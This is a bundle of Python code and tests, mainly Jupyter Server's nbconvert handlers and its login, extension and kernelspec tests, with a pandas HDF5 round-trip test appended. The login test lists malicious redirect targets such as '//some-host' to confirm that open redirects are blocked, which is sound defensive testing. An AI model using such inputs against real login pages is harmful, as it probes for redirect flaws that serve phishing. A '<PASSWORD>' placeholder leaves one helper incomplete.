output_filename = os.path.splitext(name)[0] + resources["output_extension"]
zipf.writestr(output_filename, cast_bytes(output, "utf-8"))
for filename, data in output_files.items():
zipf.writestr(os.path.basename(filename), data)
zipf.close()
handler.finish(buffer.getvalue())
return True
def get_exporter(format, **kwargs):
"""get an exporter, raising appropriate errors"""
# if this fails, will raise 500
try:
from nbconvert.exporters.base import get_exporter
except ImportError as e:
raise web.HTTPError(500, "Could not import nbconvert: %s" % e) from e
try:
Exporter = get_exporter(format)
except KeyError as e:
# should this be 400?
raise web.HTTPError(404, u"No exporter for format: %s" % format) from e
try:
return Exporter(**kwargs)
except Exception as e:
app_log.exception("Could not construct Exporter: %s", Exporter)
raise web.HTTPError(500, "Could not construct Exporter: %s" % e) from e
class NbconvertFileHandler(JupyterHandler):
SUPPORTED_METHODS = ("GET",)
@web.authenticated
async def get(self, format, path):
self.check_xsrf_cookie()
exporter = get_exporter(format, config=self.config, log=self.log)
path = path.strip("/")
# If the notebook relates to a real file (default contents manager),
# give its path to nbconvert.
if hasattr(self.contents_manager, "_get_os_path"):
os_path = self.contents_manager._get_os_path(path)
ext_resources_dir, basename = os.path.split(os_path)
else:
ext_resources_dir = None
model = await ensure_async(self.contents_manager.get(path=path))
name = model["name"]
if model["type"] != "notebook":
# not a notebook, redirect to files
return FilesRedirectHandler.redirect_to_files(self, path)
nb = model["content"]
self.set_header("Last-Modified", model["last_modified"])
# create resources dictionary
mod_date = model["last_modified"].strftime(text.date_format)
nb_title = os.path.splitext(name)[0]
resource_dict = {
"metadata": {"name": nb_title, "modified_date": mod_date},
"config_dir": self.application.settings["config_dir"],
}
if ext_resources_dir:
resource_dict["metadata"]["path"] = ext_resources_dir
# Exporting can take a while, delegate to a thread so we don't block the event loop
try:
output, resources = await run_sync(
lambda: exporter.from_notebook_node(nb, resources=resource_dict)
)
except Exception as e:
self.log.exception("nbconvert failed: %s", e)
raise web.HTTPError(500, "nbconvert failed: %s" % e) from e
if respond_zip(self, name, output, resources):
return
# Force download if requested
if self.get_argument("download", "false").lower() == "true":
filename = os.path.splitext(name)[0] + resources["output_extension"]
self.set_attachment_header(filename)
# MIME type
if exporter.output_mimetype:
self.set_header("Content-Type", "%s; charset=utf-8" % exporter.output_mimetype)
self.set_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
self.finish(output)
class NbconvertPostHandler(JupyterHandler):
SUPPORTED_METHODS = ("POST",)
@web.authenticated
async def post(self, format):
exporter = get_exporter(format, config=self.config)
model = self.get_json_body()
name = model.get("name", "notebook.ipynb")
nbnode = from_dict(model["content"])
try:
output, resources = await run_sync(
lambda: exporter.from_notebook_node(
nbnode,
resources={
"metadata": {"name": name[: name.rfind(".")]},
"config_dir": self.application.settings["config_dir"],
},
)
)
except Exception as e:
raise web.HTTPError(500, "nbconvert failed: %s" % e) from e
if respond_zip(self, name, output, resources):
return
# MIME type
if exporter.output_mimetype:
self.set_header("Content-Type", "%s; charset=utf-8" % exporter.output_mimetype)
self.finish(output)
# -----------------------------------------------------------------------------
# URL to handler mappings
# -----------------------------------------------------------------------------
_format_regex = r"(?P<format>\w+)"
default_handlers = [
(r"/nbconvert/%s" % _format_regex, NbconvertPostHandler),
(r"/nbconvert/%s%s" % (_format_regex, path_regex), NbconvertFileHandler),
]
```
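The POST handler above expects a JSON body holding a notebook model (`name` plus `content`). A hedged client sketch: the server URL and token are placeholders, the endpoint path follows the `default_handlers` mapping, and authentication details such as XSRF handling are simplified.
```python
# Illustrative sketch only: server URL and token are placeholders.
import json
import nbformat
import requests

base = "http://localhost:8888"
token = "REPLACE_WITH_SERVER_TOKEN"

nb = nbformat.v4.new_notebook()
nb.cells.append(nbformat.v4.new_code_cell("print('hello')"))

body = {"name": "scratch.ipynb", "content": nb}   # NotebookNode is a dict subclass
resp = requests.post(
    f"{base}/nbconvert/html",
    headers={"Authorization": f"token {token}"},
    data=json.dumps(body),
)
print(resp.status_code, resp.headers.get("Content-Type"))
```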
#### File: services/security/handlers.py
```python
from tornado import web
from . import csp_report_uri
from ...base.handlers import APIHandler
class CSPReportHandler(APIHandler):
"""Accepts a content security policy violation report"""
_track_activity = False
def skip_check_origin(self):
"""Don't check origin when reporting origin-check violations!"""
return True
def check_xsrf_cookie(self):
# don't check XSRF for CSP reports
return
@web.authenticated
def post(self):
"""Log a content security policy violation report"""
self.log.warning(
"Content security violation: %s", self.request.body.decode("utf8", "replace")
)
default_handlers = [(csp_report_uri, CSPReportHandler)]
```
#### File: tests/auth/test_login.py
```python
from functools import partial
from urllib.parse import urlencode
import pytest
from tornado.httpclient import HTTPClientError
from tornado.httputil import parse_cookie
from tornado.httputil import url_concat
from jupyter_server.utils import url_path_join
# override default config to ensure a non-empty base url is used
@pytest.fixture
def jp_base_url():
return "/a%40b/"
@pytest.fixture
def jp_server_config(jp_base_url):
return {
"ServerApp": {
"base_url": jp_base_url,
},
}
async def _login(jp_serverapp, http_server_client, jp_base_url, next):
# first: request login page with no creds
login_url = url_path_join(jp_base_url, "login")
first = await http_server_client.fetch(login_url)
cookie_header = first.headers["Set-Cookie"]
cookies = parse_cookie(cookie_header)
# second, submit login form with credentials
try:
resp = await http_server_client.fetch(
url_concat(login_url, {"next": next}),
method="POST",
body=urlencode(
{
"password": <PASSWORD>,
"_xsrf": cookies.get("_xsrf", ""),
}
),
headers={"Cookie": cookie_header},
follow_redirects=False,
)
except HTTPClientError as e:
if e.code != 302:
raise
return e.response.headers["Location"]
else:
assert resp.code == 302, "Should have returned a redirect!"
@pytest.fixture
def login(jp_serverapp, http_server_client, jp_base_url):
"""Fixture to return a function to login to a Jupyter server
by submitting the login page form
"""
yield partial(_login, jp_serverapp, http_server_client, jp_base_url)
@pytest.mark.parametrize(
"bad_next",
(
r"\\tree",
"//some-host",
"//host{base_url}tree",
"https://google.com",
"/absolute/not/base_url",
),
)
async def test_next_bad(login, jp_base_url, bad_next):
bad_next = bad_next.format(base_url=jp_base_url)
url = await login(bad_next)
assert url == jp_base_url
@pytest.mark.parametrize(
"next_path",
(
"tree/",
"//{base_url}tree",
"notebooks/notebook.ipynb",
"tree//something",
),
)
async def test_next_ok(login, jp_base_url, next_path):
next_path = next_path.format(base_url=jp_base_url)
expected = jp_base_url + next_path
actual = await login(next=expected)
assert actual == expected
```
#### File: tests/extension/test_config.py
```python
import pytest
from jupyter_core.paths import jupyter_config_path
from jupyter_server.extension.config import (
ExtensionConfigManager,
)
# Use the ServerApp's environment because it monkeypatches
# jupyter_core.paths and provides a config directory
# that doesn't cross-contaminate the user config directory.
pytestmark = pytest.mark.usefixtures("jp_environ")
@pytest.fixture
def configd(jp_env_config_path):
"""A pathlib.Path object that acts like a jupyter_server_config.d folder."""
configd = jp_env_config_path.joinpath("jupyter_server_config.d")
configd.mkdir()
return configd
ext1_json_config = """\
{
"ServerApp": {
"jpserver_extensions": {
"ext1_config": true
}
}
}
"""
@pytest.fixture
def ext1_config(configd):
config = configd.joinpath("ext1_config.json")
config.write_text(ext1_json_config)
ext2_json_config = """\
{
"ServerApp": {
"jpserver_extensions": {
"ext2_config": false
}
}
}
"""
@pytest.fixture
def ext2_config(configd):
config = configd.joinpath("ext2_config.json")
config.write_text(ext2_json_config)
def test_list_extension_from_configd(ext1_config, ext2_config):
manager = ExtensionConfigManager(read_config_path=jupyter_config_path())
extensions = manager.get_jpserver_extensions()
assert "ext2_config" in extensions
assert "ext1_config" in extensions
```
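The two fixtures above each drop a JSON fragment into `jupyter_server_config.d/`, and the test expects the manager to merge them into a single `jpserver_extensions` mapping. A self-contained sketch of that merge, with the snippets inlined so it runs on its own:

```python
import json

# The config.d snippets written by the fixtures above, inlined for illustration.
snippets = [
    '{"ServerApp": {"jpserver_extensions": {"ext1_config": true}}}',
    '{"ServerApp": {"jpserver_extensions": {"ext2_config": false}}}',
]
merged = {}
for raw in snippets:
    merged.update(json.loads(raw)["ServerApp"]["jpserver_extensions"])
print(merged)  # {'ext1_config': True, 'ext2_config': False}
```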
#### File: tests/extension/test_manager.py
```python
import os
import unittest.mock as mock
import pytest
from jupyter_core.paths import jupyter_config_path
from jupyter_server.extension.manager import ExtensionManager
from jupyter_server.extension.manager import ExtensionMetadataError
from jupyter_server.extension.manager import ExtensionModuleNotFound
from jupyter_server.extension.manager import ExtensionPackage
from jupyter_server.extension.manager import ExtensionPoint
# Use the ServerApp's environment because it monkeypatches
# jupyter_core.paths and provides a config directory
# that doesn't cross-contaminate the user config directory.
pytestmark = pytest.mark.usefixtures("jp_environ")
def test_extension_point_api():
# Import mock extension metadata
from .mockextensions import _jupyter_server_extension_points
# Testing the first path (which is an extension app).
metadata_list = _jupyter_server_extension_points()
point = metadata_list[0]
module = point["module"]
app = point["app"]
e = ExtensionPoint(metadata=point)
assert e.module_name == module
assert e.name == app.name
assert app is not None
assert callable(e.load)
assert callable(e.link)
assert e.validate()
def test_extension_point_metadata_error():
# Missing the "module" key.
bad_metadata = {"name": "nonexistent"}
with pytest.raises(ExtensionMetadataError):
ExtensionPoint(metadata=bad_metadata)
def test_extension_point_notfound_error():
bad_metadata = {"module": "nonexistent"}
with pytest.raises(ExtensionModuleNotFound):
ExtensionPoint(metadata=bad_metadata)
def test_extension_package_api():
# Import mock extension metadata
from .mockextensions import _jupyter_server_extension_points
# Testing the first path (which is an extension app).
metadata_list = _jupyter_server_extension_points()
path1 = metadata_list[0]
app = path1["app"]
e = ExtensionPackage(name="jupyter_server.tests.extension.mockextensions")
e.extension_points
assert hasattr(e, "extension_points")
assert len(e.extension_points) == len(metadata_list)
assert app.name in e.extension_points
assert e.validate()
def test_extension_package_notfound_error():
with pytest.raises(ExtensionModuleNotFound):
ExtensionPackage(name="nonexistent")
def _normalize_path(path_list):
return [p.rstrip(os.path.sep) for p in path_list]
def test_extension_manager_api(jp_serverapp):
jpserver_extensions = {"jupyter_server.tests.extension.mockextensions": True}
manager = ExtensionManager(serverapp=jp_serverapp)
assert manager.config_manager
expected = _normalize_path(os.path.join(jupyter_config_path()[0], "serverconfig"))
assert _normalize_path(manager.config_manager.read_config_path[0]) == expected
manager.from_jpserver_extensions(jpserver_extensions)
assert len(manager.extensions) == 1
assert "jupyter_server.tests.extension.mockextensions" in manager.extensions
def test_extension_manager_linked_extensions(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions"
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name)
assert name in manager.linked_extensions
def test_extension_manager_fail_add(jp_serverapp):
name = "jupyter_server.tests.extension.notanextension"
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(ExtensionModuleNotFound):
manager.add_extension(name, enabled=True)
def test_extension_manager_fail_link(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions.app"
with mock.patch(
"jupyter_server.tests.extension.mockextensions.app.MockExtensionApp.parse_command_line",
side_effect=RuntimeError,
):
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(RuntimeError):
manager.link_extension(name)
def test_extension_manager_fail_load(jp_serverapp):
name = "jupyter_server.tests.extension.mockextensions.app"
with mock.patch(
"jupyter_server.tests.extension.mockextensions.app.MockExtensionApp.initialize_handlers",
side_effect=RuntimeError,
):
manager = ExtensionManager(serverapp=jp_serverapp)
manager.add_extension(name, enabled=True)
manager.link_extension(name)
manager.load_extension(name) # should only warn
jp_serverapp.reraise_server_extension_failures = True
with pytest.raises(RuntimeError):
manager.load_extension(name)
```
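The failure tests above step through the same add -> link -> load lifecycle that a server uses when enabling an extension. A minimal sketch of that sequence, assuming an already-initialized `ServerApp` instance (passed in as a parameter here):

```python
from jupyter_server.extension.manager import ExtensionManager


def enable_extension(serverapp, name):
    # Hedged sketch of the lifecycle exercised by the tests above.
    manager = ExtensionManager(serverapp=serverapp)
    manager.add_extension(name, enabled=True)  # resolve the package and its extension points
    manager.link_extension(name)               # let the extension configure the ServerApp
    manager.load_extension(name)               # register the extension's handlers
    return manager
```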
#### File: tests/nbconvert/test_handlers.py
```python
import json
from base64 import encodebytes
from shutil import which
import pytest
import tornado
from nbformat import writes
from nbformat.v4 import new_code_cell
from nbformat.v4 import new_markdown_cell
from nbformat.v4 import new_notebook
from nbformat.v4 import new_output
from ..utils import expected_http_error
png_green_pixel = encodebytes(
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00"
b"\x00\x00\x01\x00\x00x00\x01\x08\x02\x00\x00\x00\x90wS\xde\x00\x00\x00\x0cIDAT"
b"\x08\xd7c\x90\xfb\xcf\x00\x00\x02\\\x01\x1e.~d\x87\x00\x00\x00\x00IEND\xaeB`\x82"
).decode("ascii")
@pytest.fixture
def notebook(jp_root_dir):
# Build sub directory.
subdir = jp_root_dir / "foo"
if not jp_root_dir.joinpath("foo").is_dir():
subdir.mkdir()
# Build a notebook programmatically.
nb = new_notebook()
nb.cells.append(new_markdown_cell(u"Created by test ³"))
cc1 = new_code_cell(source=u"print(2*6)")
cc1.outputs.append(new_output(output_type="stream", text=u"12"))
cc1.outputs.append(
new_output(
output_type="execute_result",
data={"image/png": png_green_pixel},
execution_count=1,
)
)
nb.cells.append(cc1)
# Write file to tmp dir.
nbfile = subdir / "testnb.ipynb"
nbfile.write_text(writes(nb, version=4), encoding="utf-8")
pytestmark = pytest.mark.skipif(not which("pandoc"), reason="Command 'pandoc' is not available")
async def test_from_file(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "html", "foo", "testnb.ipynb", method="GET", params={"download": False}
)
assert r.code == 200
assert "text/html" in r.headers["Content-Type"]
assert "Created by test" in r.body.decode()
assert "print" in r.body.decode()
r = await jp_fetch(
"nbconvert", "python", "foo", "testnb.ipynb", method="GET", params={"download": False}
)
assert r.code == 200
assert "text/x-python" in r.headers["Content-Type"]
assert "print(2*6)" in r.body.decode()
async def test_from_file_404(jp_fetch, notebook):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch(
"nbconvert",
"html",
"foo",
"thisdoesntexist.ipynb",
method="GET",
params={"download": False},
)
assert expected_http_error(e, 404)
async def test_from_file_download(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "python", "foo", "testnb.ipynb", method="GET", params={"download": True}
)
content_disposition = r.headers["Content-Disposition"]
assert "attachment" in content_disposition
assert "testnb.py" in content_disposition
async def test_from_file_zip(jp_fetch, notebook):
r = await jp_fetch(
"nbconvert", "latex", "foo", "testnb.ipynb", method="GET", params={"download": True}
)
assert "application/zip" in r.headers["Content-Type"]
assert ".zip" in r.headers["Content-Disposition"]
async def test_from_post(jp_fetch, notebook):
r = await jp_fetch(
"api/contents/foo/testnb.ipynb",
method="GET",
)
nbmodel = json.loads(r.body.decode())
r = await jp_fetch("nbconvert", "html", method="POST", body=json.dumps(nbmodel))
assert r.code == 200
assert "text/html" in r.headers["Content-Type"]
assert "Created by test" in r.body.decode()
assert "print" in r.body.decode()
r = await jp_fetch("nbconvert", "python", method="POST", body=json.dumps(nbmodel))
assert r.code == 200
assert u"text/x-python" in r.headers["Content-Type"]
assert "print(2*6)" in r.body.decode()
async def test_from_post_zip(jp_fetch, notebook):
r = await jp_fetch(
"api/contents/foo/testnb.ipynb",
method="GET",
)
nbmodel = json.loads(r.body.decode())
r = await jp_fetch("nbconvert", "latex", method="POST", body=json.dumps(nbmodel))
assert "application/zip" in r.headers["Content-Type"]
assert ".zip" in r.headers["Content-Disposition"]
```
#### File: services/kernelspecs/test_api.py
```python
import json
import pytest
import tornado
from jupyter_client.kernelspec import NATIVE_KERNEL_NAME
from ...utils import expected_http_error
from ...utils import some_resource
async def test_list_kernelspecs_bad(jp_fetch, jp_kernelspecs, jp_data_dir):
    bad_kernel_dir = jp_data_dir.joinpath("kernels", "bad2")
bad_kernel_dir.mkdir(parents=True)
bad_kernel_json = bad_kernel_dir.joinpath("kernel.json")
bad_kernel_json.write_text("garbage")
r = await jp_fetch("api", "kernelspecs", method="GET")
model = json.loads(r.body.decode())
assert isinstance(model, dict)
assert model["default"] == NATIVE_KERNEL_NAME
specs = model["kernelspecs"]
assert isinstance(specs, dict)
assert len(specs) > 2
async def test_list_kernelspecs(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", method="GET")
model = json.loads(r.body.decode())
assert isinstance(model, dict)
assert model["default"] == NATIVE_KERNEL_NAME
specs = model["kernelspecs"]
assert isinstance(specs, dict)
assert len(specs) > 2
def is_sample_kernelspec(s):
return s["name"] == "sample" and s["spec"]["display_name"] == "Test kernel"
def is_default_kernelspec(s):
return s["name"] == NATIVE_KERNEL_NAME and s["spec"]["display_name"].startswith("Python")
assert any(is_sample_kernelspec(s) for s in specs.values()), specs
assert any(is_default_kernelspec(s) for s in specs.values()), specs
async def test_get_kernelspecs(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", "Sample", method="GET")
model = json.loads(r.body.decode())
assert model["name"].lower() == "sample"
assert isinstance(model["spec"], dict)
assert model["spec"]["display_name"] == "Test kernel"
assert isinstance(model["resources"], dict)
async def test_get_kernelspec_spaces(jp_fetch, jp_kernelspecs):
r = await jp_fetch("api", "kernelspecs", "sample%202", method="GET")
model = json.loads(r.body.decode())
assert model["name"].lower() == "sample 2"
async def test_get_nonexistant_kernelspec(jp_fetch, jp_kernelspecs):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("api", "kernelspecs", "nonexistant", method="GET")
assert expected_http_error(e, 404)
async def test_get_kernel_resource_file(jp_fetch, jp_kernelspecs):
r = await jp_fetch("kernelspecs", "sAmple", "resource.txt", method="GET")
res = r.body.decode("utf-8")
assert res == some_resource
async def test_get_nonexistant_resource(jp_fetch, jp_kernelspecs):
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("kernelspecs", "nonexistant", "resource.txt", method="GET")
assert expected_http_error(e, 404)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch("kernelspecs", "sample", "nonexistant.txt", method="GET")
assert expected_http_error(e, 404)
```
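A sketch of the `/api/kernelspecs` response shape these tests assert against; the field names come from the assertions above, and the values are illustrative only:

```python
# Hedged sketch: values are placeholders, only the structure matters.
example_response = {
    "default": "python3",
    "kernelspecs": {
        "sample": {
            "name": "sample",
            "spec": {"display_name": "Test kernel"},
            "resources": {},
        },
    },
}
assert example_response["kernelspecs"]["sample"]["spec"]["display_name"] == "Test kernel"
```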
#### File: nbclassic/tests/test_nbserver.py
```python
import pytest
def test_classic_notebook_templates(jp_serverapp):
classic_notebook_templates = [
"notebook.html",
"tree.html"
]
# Get the server's template environment.
template_env = jp_serverapp.web_app.settings.get("notebook_jinja2_env")
for name in classic_notebook_templates:
template_env.get_template(name)
async def test_classic_notebook_asset_URLS(jp_fetch):
classic_notebook_paths = [
# Some classic notebook asset paths
'/static/notebook/js/main.js',
'/static/services/contents.js',
# NBclassic asset paths work too.
'/static/notebook/notebook/js/main.js',
'/static/notebook/services/contents.js',
]
for url_path in classic_notebook_paths:
r = await jp_fetch(url_path)
assert r.code == 200
```
#### File: io/pytables/test_round_trip.py
```python
import datetime
import re
from warnings import (
catch_warnings,
simplefilter,
)
import numpy as np
import pytest
from pandas._libs.tslibs import Timestamp
from pandas.compat import is_platform_windows
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
_testing as tm,
bdate_range,
read_hdf,
)
from pandas.tests.io.pytables.common import (
_maybe_remove,
ensure_clean_path,
ensure_clean_store,
)
from pandas.util import _test_decorators as td
_default_compressor = "blosc"
pytestmark = pytest.mark.single
def test_conv_read_write(setup_path):
with tm.ensure_clean() as path:
def roundtrip(key, obj, **kwargs):
obj.to_hdf(path, key, **kwargs)
return read_hdf(path, key)
o = tm.makeTimeSeries()
tm.assert_series_equal(o, roundtrip("series", o))
o = tm.makeStringSeries()
tm.assert_series_equal(o, roundtrip("string_series", o))
o = tm.makeDataFrame()
tm.assert_frame_equal(o, roundtrip("frame", o))
# table
df = DataFrame({"A": range(5), "B": range(5)})
df.to_hdf(path, "table", append=True)
result = read_hdf(path, "table", where=["index>2"])
tm.assert_frame_equal(df[df.index > 2], result)
def test_long_strings(setup_path):
# GH6166
df = DataFrame(
{"a": tm.rands_array(100, size=10)}, index=tm.rands_array(100, size=10)
)
with ensure_clean_store(setup_path) as store:
store.append("df", df, data_columns=["a"])
result = store.select("df")
tm.assert_frame_equal(df, result)
def test_api(setup_path):
# GH4584
# API issue when to_hdf doesn't accept append AND format args
with ensure_clean_path(setup_path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, "df", append=True, format="table")
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
# append to False
df.iloc[:10].to_hdf(path, "df", append=False, format="table")
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_path(setup_path) as path:
df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, "df", append=True)
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
# append to False
df.iloc[:10].to_hdf(path, "df", append=False, format="table")
df.iloc[10:].to_hdf(path, "df", append=True)
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_path(setup_path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, "df", append=False, format="fixed")
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df", append=False, format="f")
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df", append=False)
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df")
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_store(setup_path) as store:
df = tm.makeDataFrame()
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=True, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
# append to False
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
# formats
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format=None)
tm.assert_frame_equal(store.select("df"), df)
with ensure_clean_path(setup_path) as path:
# Invalid.
df = tm.makeDataFrame()
msg = "Can only append to Tables"
with pytest.raises(ValueError, match=msg):
df.to_hdf(path, "df", append=True, format="f")
with pytest.raises(ValueError, match=msg):
df.to_hdf(path, "df", append=True, format="fixed")
msg = r"invalid HDFStore format specified \[foo\]"
with pytest.raises(TypeError, match=msg):
df.to_hdf(path, "df", append=True, format="foo")
with pytest.raises(TypeError, match=msg):
df.to_hdf(path, "df", append=False, format="foo")
# File path doesn't exist
path = ""
msg = f"File {path} does not exist"
with pytest.raises(FileNotFoundError, match=msg):
read_hdf(path, "df")
def test_get(setup_path):
with ensure_clean_store(setup_path) as store:
store["a"] = tm.makeTimeSeries()
left = store.get("a")
right = store["a"]
tm.assert_series_equal(left, right)
left = store.get("/a")
right = store["/a"]
tm.assert_series_equal(left, right)
with pytest.raises(KeyError, match="'No object named b in the file'"):
store.get("b")
def test_put_integer(setup_path):
# non-date, non-string index
df = DataFrame(np.random.randn(50, 100))
_check_roundtrip(df, tm.assert_frame_equal, setup_path)
def test_table_values_dtypes_roundtrip(setup_path):
with ensure_clean_store(setup_path) as store:
df1 = DataFrame({"a": [1, 2, 3]}, dtype="f8")
store.append("df_f8", df1)
tm.assert_series_equal(df1.dtypes, store["df_f8"].dtypes)
df2 = DataFrame({"a": [1, 2, 3]}, dtype="i8")
store.append("df_i8", df2)
tm.assert_series_equal(df2.dtypes, store["df_i8"].dtypes)
# incompatible dtype
msg = re.escape(
"invalid combination of [values_axes] on appending data "
"[name->values_block_0,cname->values_block_0,"
"dtype->float64,kind->float,shape->(1, 3)] vs "
"current table [name->values_block_0,"
"cname->values_block_0,dtype->int64,kind->integer,"
"shape->None]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_i8", df1)
# check creation/storage/retrieval of float32 (a bit hacky to
        # actually create them though)
df1 = DataFrame(np.array([[1], [2], [3]], dtype="f4"), columns=["A"])
store.append("df_f4", df1)
tm.assert_series_equal(df1.dtypes, store["df_f4"].dtypes)
assert df1.dtypes[0] == "float32"
# check with mixed dtypes
df1 = DataFrame(
{
c: Series(np.random.randint(5), dtype=c)
for c in ["float32", "float64", "int32", "int64", "int16", "int8"]
}
)
df1["string"] = "foo"
df1["float322"] = 1.0
df1["float322"] = df1["float322"].astype("float32")
df1["bool"] = df1["float32"] > 0
df1["time1"] = Timestamp("20130101")
df1["time2"] = Timestamp("20130102")
store.append("df_mixed_dtypes1", df1)
result = store.select("df_mixed_dtypes1").dtypes.value_counts()
result.index = [str(i) for i in result.index]
expected = Series(
{
"float32": 2,
"float64": 1,
"int32": 1,
"bool": 1,
"int16": 1,
"int8": 1,
"int64": 1,
"object": 1,
"datetime64[ns]": 2,
}
)
result = result.sort_index()
expected = expected.sort_index()
tm.assert_series_equal(result, expected)
def test_series(setup_path):
s = tm.makeStringSeries()
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
ts = tm.makeTimeSeries()
_check_roundtrip(ts, tm.assert_series_equal, path=setup_path)
ts2 = Series(ts.index, Index(ts.index, dtype=object))
_check_roundtrip(ts2, tm.assert_series_equal, path=setup_path)
ts3 = Series(ts.values, Index(np.asarray(ts.index, dtype=object), dtype=object))
_check_roundtrip(
ts3, tm.assert_series_equal, path=setup_path, check_index_type=False
)
def test_float_index(setup_path):
# GH #454
index = np.random.randn(10)
s = Series(np.random.randn(10), index=index)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_tuple_index(setup_path):
# GH #492
col = np.arange(10)
idx = [(0.0, 1.0), (2.0, 3.0), (4.0, 5.0)]
data = np.random.randn(30).reshape((3, 10))
DF = DataFrame(data, index=idx, columns=col)
with catch_warnings(record=True):
simplefilter("ignore", pd.errors.PerformanceWarning)
_check_roundtrip(DF, tm.assert_frame_equal, path=setup_path)
@pytest.mark.filterwarnings("ignore::pandas.errors.PerformanceWarning")
def test_index_types(setup_path):
with catch_warnings(record=True):
values = np.random.randn(2)
func = lambda l, r: tm.assert_series_equal(l, r, check_index_type=True)
with catch_warnings(record=True):
ser = Series(values, [0, "y"])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [datetime.datetime.today(), 0])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, ["y", 0])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [datetime.date.today(), "a"])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [0, "y"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [datetime.datetime.today(), 0])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, ["y", 0])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [datetime.date.today(), "a"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1.23, "b"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1, 1.53])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1, 5])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(
values, [datetime.datetime(2012, 1, 1), datetime.datetime(2012, 1, 2)]
)
_check_roundtrip(ser, func, path=setup_path)
def test_timeseries_preepoch(setup_path):
dr = bdate_range("1/1/1940", "1/1/1960")
ts = Series(np.random.randn(len(dr)), index=dr)
try:
_check_roundtrip(ts, tm.assert_series_equal, path=setup_path)
except OverflowError:
if is_platform_windows():
pytest.xfail("known failure on some windows platforms")
else:
raise
@pytest.mark.parametrize(
"compression", [False, pytest.param(True, marks=td.skip_if_windows)]
)
def test_frame(compression, setup_path):
df = tm.makeDataFrame()
# put in some random NAs
df.values[0, 0] = np.nan
df.values[5, 3] = np.nan
_check_roundtrip_table(
df, tm.assert_frame_equal, path=setup_path, compression=compression
)
_check_roundtrip(
df, tm.assert_frame_equal, path=setup_path, compression=compression
)
tdf = tm.makeTimeDataFrame()
_check_roundtrip(
tdf, tm.assert_frame_equal, path=setup_path, compression=compression
)
with ensure_clean_store(setup_path) as store:
# not consolidated
df["foo"] = np.random.randn(len(df))
store["df"] = df
recons = store["df"]
assert recons._mgr.is_consolidated()
# empty
_check_roundtrip(df[:0], tm.assert_frame_equal, path=setup_path)
def test_empty_series_frame(setup_path):
s0 = Series(dtype=object)
s1 = Series(name="myseries", dtype=object)
df0 = DataFrame()
df1 = DataFrame(index=["a", "b", "c"])
df2 = DataFrame(columns=["d", "e", "f"])
_check_roundtrip(s0, tm.assert_series_equal, path=setup_path)
_check_roundtrip(s1, tm.assert_series_equal, path=setup_path)
_check_roundtrip(df0, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df1, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df2, tm.assert_frame_equal, path=setup_path)
@pytest.mark.parametrize("dtype", [np.int64, np.float64, object, "m8[ns]", "M8[ns]"])
def test_empty_series(dtype, setup_path):
s = Series(dtype=dtype)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_can_serialize_dates(setup_path):
rng = [x.date() for x in bdate_range("1/1/2000", "1/30/2000")]
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
_check_roundtrip(frame, tm.assert_frame_equal, path=setup_path)
